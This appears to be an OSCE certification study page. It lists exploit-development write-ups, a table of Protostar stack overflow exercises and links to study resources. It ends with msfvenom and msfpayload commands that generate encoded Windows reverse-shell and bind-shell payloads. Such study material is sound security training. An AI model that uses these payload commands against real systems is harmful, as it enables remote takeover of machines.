- Backdooring PE - Weaponizing Your Favorite PE
- SEH + Egghunter - Winamp 5.12 Exploitation using Egghunter
- SEH + Egghunter (Manual Encoding) - HP OpenView NNM 7.5 Exploitation
Exploit Exercise (Protostar)
Module | Link | Note |
---|---|---|
Stack0 | Stack BOF Intro | |
Stack1 | Stack BOF Basic1 | |
Stack2 | Stack BOF Basic2 | |
Stack3 | Stack BOF Basic3 | |
Stack4 | Stack BOF Basic4 | |
Stack5 | Stack BOF Shellcode | |
Stack6 | Stack BOF ret2libc | ROP is not needed for OSCE |
Stack7 | Stack BOF ret2.text | ROP is not needed for OSCE, but use this one to learn the POP; POP; RET concept |
- Study Plan - https://www.abatchy.com/2017/03/osce-study-plan
- Prep Guide - https://tulpa-security.com/2017/07/18/288/
- Mona.py - https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
- Techryptic - Great Tips
- Jack Halon - https://jhalon.github.io/OSCE-Review/
- Examples - https://github.com/dhn/OSCE
- OSCE_Bible - https://github.com/mohitkhemchandani/OSCE_BIBLE
- FullShade - https://github.com/FULLSHADE/OSCE (*POCs)
- h0mbre - https://github.com/h0mbre/CTP-OSCE (*Good helpers)
- ihack4falafel - https://github.com/ihack4falafel/OSCE
- FuzzSecurity - http://fuzzysecurity.com/tutorials.html
- SecuritySift - http://www.securitysift.com/
- Fuzzing
- Structured Exception Handler (SEH)
- Egghunter
- ASLR
- Shellcoding
- Web Application
```shell
# Reverse shell payload, C-formatted output (legacy msfpayload syntax)
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

# Same reverse shell with the current msfvenom syntax, alphanumeric-encoded, raw output
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw

# Bind shell payload: legacy two-step msfpayload + msfencode, output as a Perl string
msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl

# Equivalent single msfvenom command for the bind shell
msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl
```